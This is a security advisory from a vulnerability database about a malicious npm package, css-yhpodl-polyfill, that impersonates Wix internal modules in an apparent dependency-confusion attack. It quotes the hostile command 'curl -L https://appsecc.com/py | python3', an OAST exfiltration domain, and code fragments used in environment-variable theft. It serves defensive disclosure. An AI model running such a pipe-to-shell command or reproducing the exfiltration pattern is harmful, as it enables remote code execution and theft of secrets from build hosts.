VDB

GCVE-110-OSM-2026-13287

GCVE-110-OSM-2026-13287
Advisory PublishedCVSS 5.4/10
Vulnetix · Advisory published October 5, 2026
css-yhpodl-polyfill ships thunderboltRegistry.js which, as an IIFE executed on require, runs shell reconnaissance (`id`, `whoami`, `env`, `ifconfig`/`ip addr`, hostname) via child_process.execSync and sends the collected host identity and full environment variables via GET to the hardcoded Burp Collaborator OAST endpoint https://unl9pgk6ei4uf80n5tf4iktspjvbuzkn9.oastify.com/. The same file executes `curl -L https://appsecc.com/py | python3`, piping an attacker-controlled remote Python payload into python3 for arbitrary code execution on the installer host. The package name and exported identifiers (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) impersonate Wix's internal thunderbolt namespace, and registry-manifest.min.json references parastorage.com (Wix CDN) — the shape of a targeted dependency-confusion attack against the Wix engineering build pipeline. Installing or requiring this package exfiltrates environment secrets and grants remote code execution to the attacker. ENTRY index.js (main: index.js) DESTINATION - 4 exfil (oast, custom-c2) (values recorded in verified_iocs) EXFIL - OAST/Interactsh Exfiltration in thunderboltRegistry.js: "oastify.com" - Data Encoding for Exfiltration in thunderboltRegistry.js: "encodeURIComponent(site)).catch(function(){}); } catch(e" - Curl/Wget Pipe to Shell in thunderboltRegistry.js: "curl -L https://appsecc.com/py | python" - System Information Collection in thunderboltRegistry.js: "process.platform" - Suspicious Domain in thunderboltRegistry.js: "oastify.com" ADDITIONAL FINDINGS - Shell Command Execution in thunderboltRegistry.js: "require("child_process")" PAYLOAD FILES thunderboltRegistry.js

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
5.4/10
Medium · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Affected Products

VendorProductVersionsPlatforms
unknowncss-yhpodl-polyfillall (affected)—

References

advisory
vendor

Browse GCVE Records

3,130 records in the GCVE database · Updated October 6, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›